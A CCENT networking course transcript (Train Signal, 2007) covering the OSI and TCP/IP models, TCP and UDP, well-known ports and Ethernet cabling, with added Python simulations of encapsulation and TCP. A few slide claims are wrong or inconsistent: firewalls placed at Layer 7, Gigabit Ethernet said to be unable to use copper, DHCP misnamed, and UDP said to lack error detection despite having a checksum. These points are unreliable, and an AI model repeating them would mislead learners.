© Train Signal, Inc., 2002-2007

CCENT

Cisco Certified Entry Networking Technician

(Interconnecting Cisco Networking Devices Part 1)


Introduction to CCENT


• Introduction to Networking And The Networking Models
• Ethernet and CSMA/CD
• Switching
• Switch (and Router) Commands
• IP Addressing and The Routing Process
• Basic Network Protocols
• Memory, Config Files, and More Basic Commands
• Wireless LANs
• Binary and Subnetting
• Static Routing and RIP
• Wide Area Networks (WANs)
• Troubleshooting
• Basic Network Security


• Your Instructor: Chris Bryant, CCIE #12933
• Earned my CCIE on February 26, 2004
• Founded The Bryant Advantage in June of that year.
• My Video Boot Camps and other study materials place an emphasis on clearly explained theory and plenty of work on REAL CISCO routers and switches.

• Visit the website: www.thebryantadvantage.com


• Exam Prep Tips:
– Take your time and master the material.
– If possible, practice the commands on real Cisco routers and switches.
– Do not practice debugs on a production network at any time.
– Get plenty of rest the day before the exam. By that time, the die is cast.
– Don’t cram for the exam. Prepare.


Video 1: Introduction to Networking and the Networking Models


Intro to Networking and the Networking Models

• What is A Network
• The OSI Model
• The Data Transmission Process
• The TCP/IP Model
• Why Use Networking Models?
• TCP And UDP
• Ports, Sockets, and Port Numbers


• When you break networking down into the simplest concept possible, this is what we have:
– We need to get data from one point to another in the most effective manner possible.


• We build networks to allow devices such as the ones you see here to communicate with each other, and as different devices are added to the network, this communication becomes more challenging to allow.

• And it's not just allowing communication that's challenging - there are communications that we do not want to allow as well. Perhaps we only want one of those PCs to have access to the e-commerce server, and we don't want any other PCs to even know about that server. We also have to be wary of intruder attacks, because there are all kinds of bad guys who want to get into our network, and we've got to keep them out!


• The thought of learning all of this can be intimidating at first. Having worked my way from entry-level certifications all the way to the CCIE, and having taught thousands of CCNAs and CCNPs worldwide, I can tell you that the key to networking success in both the exam room and working with real-world networks can be summed up in five words:


Know And Understand The Fundamentals

• Nothing fancy, right? Right! Learning and understanding the fundamentals of networking are what this course is all about. Most of you will go on to more advanced studies, and that's great - because in this business, we're always learning new skills. The key to mastering intermediate and advanced networking is to master the fundamentals - because if you don't understand how networks operate, you can't fix them!


Why Are These Models Important?

• When it comes to the OSI and TCP/IP networking models, a common question is "Beyond passing the exam, why do I have to learn this?" I freely admit that I had that thought more than once when I began studying networking. It's particularly tough because this is usually the first material presented to networking students, and to be frank, it's not as exciting as configuring routers and switches.


• I can tell you from personal experience that you are going to use the material in this chapter throughout your networking career, so it's not just something that you have to learn to pass the CCENT and CCNA exams.

• I've personally found networking models to be helpful in developing an effective troubleshooting process, and I'll talk more about that in the Troubleshooting section of this course. I just want to let you know that this really is useful information, not just something to memorize.


The Application Layer

• This is the layer where the end users themselves interact with the network. Authentication services also run at Layer 7, but encryption runs at the next layer down.

• The Application layer ensures that the remote communication partner is available, that the needed communication resources exist (a modem, for example), and that both ends of the communication agree on procedures involving data integrity, privacy, and error recovery.


• When trying to decide if a protocol is an Application layer protocol, just remember that protocols that require the end user to enter a request are Application layer protocols. Firewalls, devices intended to keep network intruders out, operate at L7.

• Protocols and services that run at L7 include:
– Email protocols SMTP and POP3
– Telnet
– HTTP
– File Transfer Protocol (FTP)
– Simple Network Management Protocol (SNMP)


The Presentation Layer

• This layer answers one simple question: "How should this data be presented?" In addition to properly formatting data, encryption occurs at this layer.

• Have you ever opened a file in a word processing application, and you got pages of unrecognizable characters? That’s a Presentation Layer issue. The applications have not agreed on how the data is to be presented.


• There are four primary tasks that the Presentation Layer is concerned with:
1. Compatibility with the operating system
2. Proper encapsulation of data for network transmission.
3. Data formatting (ASCII, binary)
4. Data encryption, compression, and translation.

• You've probably seen some of the file types that are used at the Presentation layer - JPEG, ASCII, GIF, MPEG, MIDI, EBCDIC, and TIFF.


The Session Layer

• Layer 5 is the "manager" of the two-way communication between two remote hosts. This is the layer that handles the creation, maintenance, and teardown of communications between those two hosts. The overall communication itself is referred to as a session.

• Some sessions last just long enough to send a unidirectional message, while other sessions will be of longer duration.


The Transport Layer

• The Transport Layer’s purpose is to establish a logical end-to-end connection between two systems, segment data received from the upper layers of the OSI model, and to make sure the data gets to the destination in the correct order and free of errors.

• At the Transport Layer, there are two methods for transporting data: connection-oriented, referring to TCP, and connectionless, referring to UDP. We'll take a much more detailed look at TCP and UDP later in this section.


The Network Layer

• It's at Layer 3 of the OSI model that you and I as network admins begin to have a great deal of interaction with the network. IP runs at this layer, and since routers operate here at L3, this layer is often called "the routing layer".

• In a nutshell, routing is a two-question process:
– What valid paths exist from the local router to a given destination?
– What is the best path (the "optimal path") to take to get there?

• Lots more on this layer to come later in the course!


The Data Link Layer

• The switches that we'll spend so much time with later in the course operate at Layer 2. Wireless Access Points (WAPs) also operate at this layer - more on WAPs in the Wireless section. Devices that you may well be using right now to access the Internet, cable modems and DSL modems, also run at L2.

• We've got four major specifications that run here, some of which you may already be familiar with:
– Ethernet
– High-Level Data Link Control (HDLC)
– Point-to-Point Protocol (PPP)
– Frame Relay


• A very important distinction: The data link layer does perform error detection through something called the Frame Check Sequence (more on that later), but this layer does not perform error recovery.

• The Data Link Layer is generally referred to as Layer 2, and MAC addresses as Layer 2 addresses. If you're not familiar with MAC addresses, they will be discussed in more detail in the Ethernet and LAN Switching sections.


• Another name for the MAC address is a little misleading, so let's nail this down. MAC addresses are sometimes called hardware addresses and physical addresses. That's because a MAC address is physically burned into the Network Interface Card (NIC), which leads to another name for this address - a burned-in address (BIA).

• What's the misleading part? Remember that physical addresses are not used at the Physical layer of the OSI model - they're Data Link layer addresses. That's right - a physical address is used to deliver a frame, but not a physical layer address.


• Switches operate at L2, as do bridges. Layer 3 Switches do exist, but when operating at Layer 3, they’re not switching or bridging. They’re routing. You don't need to know about L3 switches for the CCENT exam, but you should know they exist as they're becoming more and more popular in today's networks.


The Physical Layer

• When things get a little complicated in networking, I like to remind myself that "it's all ones and zeroes!" Whatever data our end users are creating, it's going to eventually be "translated" into a series of 1s and 0s. Once that is done, it's the Physical layer that handles the actual data transmission. Anything to do with a physical cable or the standards in use - the pins, the connectors, the electrical current itself - is running at the Physical layer.

The Data Transmission Process

• When the end user sends data, that data will go through all seven layers of the OSI model. The data is broken up into smaller and smaller parts beginning at Layer 4 (the Transport layer) until it's in the form of electric signals that can be sent across the physical media.

• As the data flows down the OSI model, it's referred to by different terms. You really have to master these and watch for them on your exams. There are four different terms you need to know:

• At the Application, Presentation, and Session layers, data is simply called "data".

• At the Transport layer, data is placed into segments.
• At the Network layer, data is placed into packets.
• At the Data Link layer, data is placed into frames.
• Finally, at the Physical layer, data takes the form of bits - and remember, it's all ones and zeroes!


• Those are very important terms for your career and especially for your exams. If I mention "segments", you should know I'm discussing the Transport layer of the OSI model without any other hints, because you might not get any other hints!

• As data flows down the OSI model, each layer adds a header that will be removed by the same layer on the other end of the session. These headers are layer-specific in that the Network layer couldn't care less about the contents of any header except the Network layer on the other end of the session.

• As an end user enters data for transmission to a remote host, the first six layers of the OSI model will add a layer-specific header that contains information to be read by the same layer of the OSI model at the remote location. Note that Layer 2, the Data Link layer, adds both a trailer and a header.

• The combination of data and a layer-specific header is called a Protocol Data Unit (PDU). There's a PDU for each layer; that is, the combination of data and L7 header information is called an L7 PDU, the data and L6 header information is called an L6 PDU, and so forth.

• After the data is successfully transmitted by the Physical layer to the remote location, the data begins to travel back up the model. Each layer will remove the header added by its counterpart - that is, Layer 3 removes the L3 header and reads it, L4 removes the L4 header and reads it, and so forth.


• The term same-layer interaction describes the process of a given OSI layer removing the header placed on the data by the same layer on the sending side. For example, the Application layer on the receiving end will remove only the header placed onto the data by the Application layer on the sending side, and so forth.
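The encapsulation walk described above, as an added example that is not from the course: data is wrapped into a segment, a packet, a frame with its FCS trailer, and finally bits, then unwrapped with each layer reading only the header its counterpart added. The headers are deliberately simplified (ports only at L4, addresses only at L3), and the addresses are constructed sample values; the FCS is a CRC-32, which is what a real Ethernet FCS uses.

```python
import struct
import zlib

# Constructed sample addresses (not from the course).
SRC_MAC = bytes.fromhex("001122334455")
DST_MAC = bytes.fromhex("66778899aabb")
SRC_IP = bytes([10, 1, 1, 1])
DST_IP = bytes([10, 1, 1, 2])


def add_l4_header(data: bytes, src_port: int, dst_port: int) -> bytes:
    """Transport layer: data becomes a segment (simplified header: two ports)."""
    return struct.pack("!HH", src_port, dst_port) + data


def add_l3_header(segment: bytes) -> bytes:
    """Network layer: the segment becomes a packet (simplified header: two IPs)."""
    return SRC_IP + DST_IP + segment


def add_l2_header_and_trailer(packet: bytes) -> bytes:
    """Data Link layer: the packet becomes a frame. Layer 2 is the one layer that adds
    both a header (the MAC addresses) and a trailer, the Frame Check Sequence (FCS)."""
    body = DST_MAC + SRC_MAC + packet
    fcs = struct.pack("!I", zlib.crc32(body) & 0xFFFFFFFF)
    return body + fcs


def to_bits(frame: bytes) -> str:
    """Physical layer: the frame becomes bits - it's all ones and zeroes."""
    return "".join(f"{b:08b}" for b in frame)


def from_bits(bits: str) -> bytes:
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def strip_l2(frame: bytes):
    """Receiving Layer 2 verifies the FCS. This is error detection only: a damaged
    frame is silently dropped (None). Recovery is not L2's job; TCP handles that."""
    body, fcs = frame[:-4], frame[-4:]
    if struct.pack("!I", zlib.crc32(body) & 0xFFFFFFFF) != fcs:
        return None
    _dst_mac, _src_mac, packet = body[:6], body[6:12], body[12:]
    return packet


def strip_l3(packet: bytes) -> bytes:
    """Same-layer interaction: L3 removes and reads only the L3 header, nothing else."""
    _src_ip, _dst_ip, segment = packet[:4], packet[4:8], packet[8:]
    return segment


def strip_l4(segment: bytes):
    _src_port, dst_port = struct.unpack("!HH", segment[:4])
    return dst_port, segment[4:]


def send(data: bytes, src_port: int = 40000, dst_port: int = 23) -> str:
    """Down the model on the sending host: data -> segment -> packet -> frame -> bits."""
    segment = add_l4_header(data, src_port, dst_port)
    packet = add_l3_header(segment)
    frame = add_l2_header_and_trailer(packet)
    return to_bits(frame)


def receive(bits: str):
    """Back up the model on the receiving host. Returns (dst_port, data), or None
    when Layer 2 detected a corrupted frame and discarded it."""
    packet = strip_l2(from_bits(bits))
    if packet is None:
        return None
    return strip_l4(strip_l3(packet))


def flip_bit(bits: str, index: int) -> str:
    """Simulated line noise: invert a single bit on the wire."""
    flipped = "0" if bits[index] == "1" else "1"
    return bits[:index] + flipped + bits[index + 1:]


if __name__ == "__main__":
    wire = send(b"hello")
    print(len(wire), "bits on the wire ->", receive(wire))
    print("one flipped bit ->", receive(flip_bit(wire, 200)))
```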

• The TCP/IP model is another way to look at the overall data transport process, and it also uses layers to illustrate the process. However, it uses only four layers to do so. For the CCENT, CCNA, and any entry-level certification exam from another vendor, it's a very good idea to know…
– the layers of both the TCP/IP and OSI model
– the responsibilities of each layer
– how the layers map from one model to another


• The Application layer of the TCP/IP model maps to the top three layers of the OSI model (Application, Presentation, and Session). Everything that the top three layers of the OSI model do is performed by the TCP/IP model's Application layer.

• The Transport layer of the TCP/IP model maps directly to the Transport layer of the OSI model. TCP and UDP both operate at this layer, and data takes the form of segments.


• The Internet layer of the TCP/IP model maps to the Network layer of the OSI model. Both layers are responsible for routing through the use of IP addresses, static routes, and dynamic routing protocols.

• (You will occasionally see some non-Cisco documentation call this layer the Internetwork layer, but "Internet" is the name used in Cisco documentation.)

• Finally, the Network Access layer of the TCP/IP model maps to the Data Link and Physical layers of the OSI model.


So Why Do We Go Through All Of This, Anyway?

• It's natural to ask why we use networking models in the first place. It's a good question, and there are some good answers!

• Networking models do help software vendors create products that are interoperable. (At least, we hope they're interoperable.) That doesn't affect us directly as network admins, but two uses of these models affect us directly both as admins and as students.

• Breaking networking operations up into smaller parts makes it easier to learn networking in the first place. By using the OSI model in particular, you can take a structured approach to your learning:
– First, learn about cables and physical specifications (L1)
– Then learn about switches and MAC addresses (L2)
– Then start on routing (L3)


• Using the OSI model to structure your troubleshooting approach is a real help, too. I always tell students to "start troubleshooting at the physical layer", and you'll see what I mean in the Troubleshooting section of the course. There are two kinds of troubleshooters in the world:
– Those who have a structured approach
– Those who don't and are basically throwing stuff out there and hoping something works

• TCP:
– Guaranteed delivery
– Error detection via sequence and ACK numbers
– Windowing
– "Connection-Oriented"

• UDP:
– "best-effort" delivery, but no guarantee of delivery
– No error detection
– No windowing
– "Connectionless"


TCP's "Three-Way Handshake"

• With TCP, there's work to be done before data is transmitted. The two devices have to agree on some basic parameters before segments can be sent - and this negotiation has the curious name three-way handshake. If that's the first time you've heard this term, you're probably wondering how a handshake can be three-way! Then again, maybe you don't want to know - but to pass the CCENT and CCNA exams, we gotta know! Let's take a step-by-step look at this process.


• Before the sender can start sending, there's going to be a negotiation between the two devices regarding rules for data transmission. That negotiation is the three-way handshake itself, which begins with the sender transmitting a TCP segment with the Synchronization ("SYN") bit set. The primary value being negotiated here is the TCP sequence number, which we'll discuss in more detail in the next section. This is the first part of the three-way handshake.


• The recipient responds with a TCP segment with both the synchronization and acknowledgement bits set - a "SYN/ACK". This is part two of the three-way handshake.


• The sender responds with an ACK, and the three-way handshake is complete.

• UDP does not use a three-way handshake.

• In addition to the orderly construction of the communication channel, TCP uses the FIN ("finish") bit to bring the channel down when the communication is closed.


TCP's Error Detection / Error Recovery Feature

• Before we take a look at how TCP performs both error detection and error recovery, we need to draw a very clear line between those two terms. They are not the same thing!
– Error detection is finding an error
– Error recovery is doing something about the error

• Watch that on your exam. :)

• TCP does both, and it uses both a sequence number and an acknowledgement number ("ack") in the TCP header to do so. In the following example, one host is sending four segments to another host. Each of the segments has a sequence number. That sequence number tells the recipient in what order to reassemble the segments, and it's also a fundamental concept in error detection and recovery.

• For simplicity's sake, we'll assume the first segment has a sequence number of 100, and we'll add 100 to the subsequent sequence numbers. (Remember, we're at the Transport layer - these are segments!)


• The recipient will now send a segment back that contains no data, but does have an ack number set. You might think that the ack number would reflect the last sequence number received, but that's not quite right. The ack number will actually indicate the next sequence number the data recipient expects to see!


• This entire process revolves around two things:
– The sender is waiting for a positive message from the recipient that the data was received
– If that message isn't received, the data is retransmitted

• That's why we call this entire process Positive Acknowledgement with Retransmission (PAR).


• "Windowing" refers to the amount of data that a data sender is allowed to transmit without waiting for an ack. In this case, the size of the window is 2400 bytes, meaning that the data sender can transmit 2400 bytes before it has to stop and wait for an ack.

• The data recipient decides the size of the window, not the sender. This gives the recipient some control over how much data is sent ("flow control").


• The term sliding window refers to this dynamic adjustment of the window size.

• UDP does not have windowing capabilities.
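The handshake, sequence/ack numbering, PAR and windowing from the last few slides, worked through in code. This is an added simulation, not the course's material and not real TCP: segments are 100 bytes starting at sequence 100 as in the slides, the recipient acks the next sequence number it expects, the 2400-byte window caps how much is sent before waiting, and `lose_once` is a constructed fault injection so a lost segment is retransmitted.

```python
from dataclasses import dataclass


@dataclass
class Segment:
    """The TCP header fields the course discusses, plus the data carried."""
    seq: int = 0
    ack: int = 0
    syn: bool = False
    ack_flag: bool = False
    fin: bool = False
    data: bytes = b""


def three_way_handshake(client_isn: int, server_isn: int) -> list:
    """Step 1: SYN. Step 2: SYN/ACK. Step 3: ACK. The value being negotiated is each
    side's starting sequence number; a SYN consumes one sequence number, so the ack
    carries isn + 1, i.e. the next sequence number expected."""
    syn = Segment(seq=client_isn, syn=True)
    syn_ack = Segment(seq=server_isn, ack=client_isn + 1, syn=True, ack_flag=True)
    ack = Segment(seq=client_isn + 1, ack=server_isn + 1, ack_flag=True)
    return [syn, syn_ack, ack]


class Receiver:
    """Data recipient: accepts the segment it expects next and acks the NEXT sequence
    number it wants to see, not the last one it received."""

    def __init__(self, first_seq: int):
        self.expected = first_seq
        self.received = []

    def accept(self, seg: Segment, lost: bool = False) -> Segment:
        if not lost and seg.seq == self.expected:
            self.received.append(seg.data)
            self.expected += len(seg.data)
        # a lost or out-of-order segment leaves 'expected' unchanged, so the ack
        # repeats the sequence number still missing
        return Segment(ack=self.expected, ack_flag=True)


def transfer(data: bytes, first_seq: int, seg_size: int, window: int, lose_once: set) -> dict:
    """Positive Acknowledgement with Retransmission (PAR) under a recipient-chosen window.
    lose_once: sequence numbers whose FIRST transmission is lost (constructed fault)."""
    if seg_size > window:
        raise ValueError("window must hold at least one segment")
    pending_loss = set(lose_once)
    receiver = Receiver(first_seq)
    segments = [Segment(seq=first_seq + i, data=data[i:i + seg_size])
                for i in range(0, len(data), seg_size)]
    base, rounds, attempts, log = 0, 0, 0, []
    while base < len(segments):
        rounds += 1
        # send as many unacknowledged bytes as the window allows, then stop and wait
        in_flight, in_flight_bytes = [], 0
        for seg in segments[base:]:
            if in_flight_bytes + len(seg.data) > window:
                break
            in_flight.append(seg)
            in_flight_bytes += len(seg.data)
        attempts += len(in_flight)
        highest_ack = receiver.expected
        for seg in in_flight:
            lost = seg.seq in pending_loss
            pending_loss.discard(seg.seq)
            reply = receiver.accept(seg, lost=lost)
            log.append((seg.seq, "lost" if lost else "sent", reply.ack))
            highest_ack = reply.ack
        # everything below the highest ack is positively acknowledged; anything
        # not acknowledged goes out again next round (the "R" in PAR)
        while base < len(segments) and segments[base].seq + len(segments[base].data) <= highest_ack:
            base += 1
    return {"received": b"".join(receiver.received), "rounds": rounds,
            "attempts": attempts, "log": log}


if __name__ == "__main__":
    for seg in three_way_handshake(100, 300):
        print(seg)
    result = transfer(b"A" * 400, first_seq=100, seg_size=100, window=2400, lose_once={200})
    for entry in result["log"]:
        print("seq %d %s -> ack %d" % entry)
    print("rounds:", result["rounds"], "segments transmitted:", result["attempts"])
```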


• All of the features we've looked at here - the three-way handshake, windowing, sequence numbering, error detection and recovery - are all TCP features. UDP doesn't use any of them. Two questions come to mind:
– Why doesn't UDP offer these features?
– Why in the world do we use UDP for anything?

• A look at the TCP and UDP headers will answer both of those questions! Here's the TCP header...

• Quite a difference! Take a few moments to compare the two and you'll see that UDP can't perform any of those TCP features because UDP literally can't offer them. The UDP header has no sequence number field, no ack number field, no ACK bit, no SYN bit, and no window field.

• The TCP and UDP headers have only three values in common:
– Source port
– Destination port
– Checksum


• Now that we've answered the question about why UDP doesn't offer the features that TCP does, let's answer the second question regarding why UDP is used in the first place. That question can really be answered with one word... overhead.

• The TCP header is much larger than the UDP header. That header is being applied to every segment, and that adds up! UDP's advantage over TCP is that its header is much smaller than TCP's.


• If you're not familiar with MAC or IP addressing, we're going to cover that in another section, but for now it's enough to know that when two hosts communicate on a network, they're using these MAC and IP addresses as the destination when the data is sent.

• So far, so good. But what if one host is sending multiple flows of information to the remote host? Let's say that the PC at 10.1.1.1 is sending three different kinds of information to the PC at 10.1.1.2:
– transferring a file via Trivial File Transfer Protocol (TFTP)
– email via Simple Mail Transfer Protocol (SMTP)
– opening a remote connection via Telnet

• If you're not familiar with those three protocols, don't worry about it - you will be before you're done with this course. For now, it's enough to know that one PC is sending three different types of information to the other, and the MAC and IP source and destination addresses for all three transmissions are going to be the same. How can the receiving host tell TFTP from SMTP if that's the case?


• We need a way for the recipient to differentiate one data flow from the other, and since the source and destination MAC and IP addresses will be the same for all three flows, that won't do. What will do is the TCP or UDP port number. While these three data flows will have the same Layer 2 (MAC) and Layer 3 (IP) source and destination addresses, they'll have different, pre-assigned port numbers.


• These port numbers allow the host at 10.1.1.1 to mix these three data streams when sending to 10.1.1.2, rather than sending all the SMTP data, then the Telnet data, then the TFTP data. The PC at 10.1.1.2 will use the port numbers to drive the three different data streams to the appropriate application. This mixing of data streams is called multiplexing.


• A socket may sound like something physical on the PC, but it's not. The socket is simply a combination of IP address and port number. For example, the socket on 10.1.1.2 for port 69 is 10.1.1.2:69. That socket can also be expressed with this format:

• (IP address, transport protocol, port number)

• That would make the TFTP socket on that PC (10.1.1.2, UDP, 69).

• The port number system works beautifully, but naturally the hosts need to agree on what port is used for a given protocol. In the previous example, if 10.1.1.1 used TCP port 45 for Telnet and 10.1.1.2 used TCP port 55, we'd have some serious problems.

• That's why most protocols use the same port number at all times, and these port numbers are referred to as well-known port numbers. All port numbers below 1024 are reserved, well-known port numbers -- but you don't have to memorize 1024 numbers for the exams!

• I do strongly recommend you have the following port numbers memorized, however. These numbers will become second nature to you as you progress in your networking studies and your career, but for now we gotta memorize these! After this list, I'll show you a little trick you can use on a Cisco router to see a list of well-known port numbers.

• Since you won't be allowed to carry a router into the exam room, though, know this list cold! Don't worry if there are services or protocols on here you're not yet familiar with - you will be before the end of this course.

• Some Common TCP Ports:
– FTP - File Transfer Protocol - Uses TCP ports 20 and 21
– SSH - Secure Shell - Uses TCP port 22
– Telnet uses TCP port 23
– SMTP - Simple Mail Transfer Protocol - uses TCP port 25
– HTTP - HyperText Transfer Protocol - uses TCP port 80
– POP3 - Post Office Protocol 3 - uses TCP port 110
– SSL - Secure Socket Layer - uses TCP port 443

• Some Common UDP Ports:
– DHCP - Dynamic Host Control Protocol - uses UDP ports 67 and 68
– TFTP - Trivial File Transfer Protocol - uses UDP port 69
– SNMP - Simple Network Management Protocol - uses UDP port 161

• Protocols Using Both TCP And UDP Ports
– DNS - Domain Name Service - uses UDP and TCP port 53
– The port number 24 is reserved in both UDP and TCP for private mail systems

• With Voice over IP (VoIP) becoming more and more commonplace in today's networks, it couldn't hurt to know that the entire range of UDP ports from 16384 - 32767 is reserved for voice traffic.
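An added example (not from the course) that ties the header comparison to the port discussion: it packs and parses a minimum TCP header (20 bytes) and a UDP header (8 bytes) with the standard field layouts, shows that only the ports and checksum exist in both, and then demultiplexes constructed sample flows to applications by the course's (IP address, transport protocol, port number) socket notation using the well-known ports listed above. The checksums are left at zero because no pseudo-header or payload is modelled.

```python
import struct

# Well-known ports exactly as the course lists them, keyed by transport.
WELL_KNOWN = {
    ("tcp", 20): "FTP-data", ("tcp", 21): "FTP", ("tcp", 22): "SSH", ("tcp", 23): "Telnet",
    ("tcp", 25): "SMTP", ("tcp", 80): "HTTP", ("tcp", 110): "POP3", ("tcp", 443): "SSL",
    ("udp", 67): "DHCP", ("udp", 68): "DHCP", ("udp", 69): "TFTP", ("udp", 161): "SNMP",
    ("tcp", 53): "DNS", ("udp", 53): "DNS",
}
TCP_HEADER_LEN = 20  # minimum TCP header, no options
UDP_HEADER_LEN = 8   # the whole UDP header

# TCP flag bits in the low byte of the data-offset/flags word.
FIN, SYN, ACK = 0x01, 0x02, 0x10


def build_tcp_header(src: int, dst: int, seq: int = 0, ack: int = 0,
                     syn: bool = False, ack_flag: bool = False, window: int = 2400) -> bytes:
    """Pack a 20-byte TCP header: ports, seq, ack, offset+flags, window, checksum, urgent."""
    flags = (SYN if syn else 0) | (ACK if ack_flag else 0)
    offset_flags = (5 << 12) | flags  # data offset 5 words = 20 bytes
    return struct.pack("!HHIIHHHH", src, dst, seq, ack, offset_flags, window, 0, 0)


def build_udp_header(src: int, dst: int, payload_len: int) -> bytes:
    """Pack the 8-byte UDP header: ports, total length, checksum. Nothing else exists."""
    return struct.pack("!HHHH", src, dst, UDP_HEADER_LEN + payload_len, 0)


def parse_tcp_header(raw: bytes) -> dict:
    """The TCP fields the course discusses. Note the seq/ack/flag/window fields."""
    src, dst, seq, ack, offset_flags, window, checksum, _urg = struct.unpack("!HHIIHHHH", raw[:20])
    flags = offset_flags & 0x01FF
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "SYN": bool(flags & SYN), "ACK": bool(flags & ACK), "FIN": bool(flags & FIN),
            "window": window, "checksum": checksum, "header_len": (offset_flags >> 12) * 4}


def parse_udp_header(raw: bytes) -> dict:
    """Only source port, destination port and checksum are shared with TCP."""
    src, dst, length, checksum = struct.unpack("!HHHH", raw[:8])
    return {"src_port": src, "dst_port": dst, "length": length,
            "checksum": checksum, "header_len": UDP_HEADER_LEN}


def common_fields() -> set:
    """Field names present in both headers (ports and checksum; header_len is ours)."""
    tcp = set(parse_tcp_header(build_tcp_header(1, 2)))
    udp = set(parse_udp_header(build_udp_header(1, 2, 0)))
    return (tcp & udp) - {"header_len"}


def header_overhead(proto: str, segments: int) -> int:
    """Transport-header bytes added across a transfer: the header rides on every segment."""
    return segments * (TCP_HEADER_LEN if proto == "tcp" else UDP_HEADER_LEN)


def demultiplex(dst_ip: str, datagrams) -> dict:
    """Hand each flow to its application by socket (IP address, transport, port).
    Same MAC/IP on every flow; the port number is what tells TFTP from SMTP."""
    delivered = {}
    for proto, raw in datagrams:
        hdr = parse_tcp_header(raw) if proto == "tcp" else parse_udp_header(raw)
        app = WELL_KNOWN.get((proto, hdr["dst_port"]), "unknown/%d" % hdr["dst_port"])
        delivered.setdefault(app, []).append((dst_ip, proto, hdr["dst_port"]))
    return delivered


if __name__ == "__main__":
    # Constructed sample flows from 10.1.1.1 to 10.1.1.2, as in the course's scenario.
    flows = [("udp", build_udp_header(50000, 69, 512)),
             ("tcp", build_tcp_header(40001, 25)),
             ("tcp", build_tcp_header(40002, 23, seq=100, syn=True))]
    print("fields common to both headers:", sorted(common_fields()))
    print("overhead for 1000 segments: tcp", header_overhead("tcp", 1000),
          "udp", header_overhead("udp", 1000))
    for app, sockets in demultiplex("10.1.1.2", flows).items():
        print(app, "<-", sockets)
```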

Video 2: Ethernet Standards And Cable Types


Ethernet Standards and Cable Types

• The Need For And Operation of CSMA/CD
• Ethernet Types And Standards
• Pins And Transmissions
• Crosstalk
• Cable Types
• Ethernet Addressing
• Intro to WAN Cabling And a Cable Type Review

• With each host connected to its own switch port, we no longer have to worry about collisions when hosts send data simultaneously. In the old days of networking, though, that wasn't the case. While you may not see the following physical topology very often in your career, if at all, I'm presenting it here so you know how hosts on a shared Ethernet segment practice CSMA/CD - Carrier Sense Multiple Access with Collision Detection.

• The Ethernet standard you're most likely to be familiar with is 10Base-T, specified by IEEE 802.3. The "T" stands for twisted-pair cable, and the maximum length of a 10Base-T copper cable is 100 meters. The "10" refers to the 10 MegaBits Per Second (MBPS) capacity.

• You may be asking "Why twist the cable pairs?" Twisting pairs of wires inside the cable cuts down on the possibility of electromagnetic interference, whether that interference comes from another cable or an outside source - elevators are notorious for generating such interference.

• In the previous illustrations, we looked at a network with a single coaxial cable and multiple hosts connected to that coax cable. That topology was used by the first Ethernet standards, 10Base5 and 10Base2.

• The sole physical components were the Ethernet cards in the computers and coaxial cable, which is the topology we looked at in the previous example. The cable made up a bus that all the connected devices would use. (This type of bus is referred to as a shared bus.)

• The ending numbers in the terms “10Base5” and “10Base2” allegedly refer to the limit on the length of the cable, expressed in units of 100 meters. This is true for 10Base5; the limit on the cable length is 500 meters. It’s not quite accurate for 10Base2, though; the limit on that cable is 185 meters, NOT 200 meters.


• Fast Ethernet is defined by IEEE 802.3u, and has a maximum capacity of 100 MBPS. Fast Ethernet copper cables also have a maximum cable length of 100 meters.


• Defined by IEEE 802.3z, Gigabit Ethernet has a maximum capacity of 1000 MBPS, also expressed as 1 GBPS (GigaBits Per Second). The maximum cable length is 100 meters here as well, but we cannot use a regular copper cable for Gigabit Ethernet.

• Ethernet runs at 10 MBPS, defined by IEEE 802.3, and its copper cable has a maximum length of 100 meters. Variations include 10Base-T, 10Base-2, and 10Base-5, with the last two involving a shared cable bus.

• Fast Ethernet runs at 100 MBPS, is defined by IEEE 802.3u, and its copper cable has a maximum length of 100 meters.

• Gigabit Ethernet runs at 1000 MBPS (1 GBPS), is defined by IEEE 802.3z, and also has a 100 meter cable length maximum - but it cannot use copper cabling.

• A standard Ethernet cabling type is Category 5 Unshielded Twisted-Pair, commonly known as CAT 5 UTP. The connector on the end of a typical Cat 5 UTP cable is an RJ-45 connector. This type of connector has a tab on the bottom that snaps into place when the connector is correctly placed into the device. (You can usually hear the “snap” sound, unless you’re in a very loud wiring closet!)

• The cable will contain separate wires inside, and the endpoints of these wires are referred to as pins. While you now know that bits are sent over these wires, it’s important to know that the same set of pins is always used to transmit, and a separate set of pins is always used to receive.
– Pins 1 and 2 Transmit
– Pins 3 and 6 Receive


• Crosstalk is caused by the electromagnetic interference mentioned a moment ago. Basically, a signal “crosses over” from one pair of cables to another, causing the signals to become unusable.

• NEXT (near-end crosstalk) is a condition generally caused by crossed or crushed pairs of wires. The conductors inside the wires don’t even have to be exposed – but if the conductors are too close, the signal traveling on one wire can actually interfere with the signal on another wire. The “near-end” is a relative term, referring to the end of the cable being tested (as opposed to far-end crosstalk, or FEXT).


• In a typical RJ-45 connection, the crosstalk is actually at its highest level as data enters the cable.

• You may occasionally see the term PSNEXT. This is short for “Power Sum Near End Cross Talk”, and refers to the calculation carried out when a NEXT test is run. When the NEXT results for each pair of wires are added, the result is the PSNEXT value.

• In the following exhibit, we've got three separate physical connections:
– A laptop connected to a switch (Cable 3)
– Two switches connected to each other (Cable 2)
– A PC connected to a switch (Cable 1)

• For Cable 1, we need a straight-through cable. A straight-through cable is used to connect a PC to a switch or hub. In a straight-through cable, the wire connected to Pin 1 on one side is connected to Pin 1 on the other, the wire connected to Pin 2 on one side is connected to Pin 2 on the other, and so forth.

• You may have occasion to connect two similar devices directly with Ethernet, which can cause a problem since both devices will use the same pair of wires for transmitting data.

• It's very common to connect two switches to allow them to send data over that connection, called a trunk. You'll learn all about the particulars of trunking in your CCNA studies, but the first thing we have to do is make sure we have the correct cable!

• What we need is a crossover cable. The wire connected to Pin 1 on one side will no longer be connected to Pin 1 on the other, as it was in a straight-through cable. Four wires will "cross over" in a crossover cable:

Local Cable End    Remote Cable End
Pin 1              Pin 3
Pin 2              Pin 6
Pin 3              Pin 1
Pin 6              Pin 2

• Two cables down, one to go! To connect that laptop directly to a switch, we've got to be careful of two things:
– Using the right cable
– Connecting the right cable to the right port on the switch


• The cable we need is a rollover cable. All eight wires in the cable will "roll over" to another pin at the remote end, with the wire on Pin 1 at one end rolling over to Pin 8 at the other end, the wire on Pin 2 at one end rolling over to Pin 7 at the remote end, and so forth.


• You may also need an adapter for your rollover cable, since one end of the cable is a DB-9 connector, and few if any of today's laptops have such a port. You probably do have USB ports on your laptop, and you can get an adapter that allows you to connect a rollover cable to your laptop's USB port from just about any cable dealer.


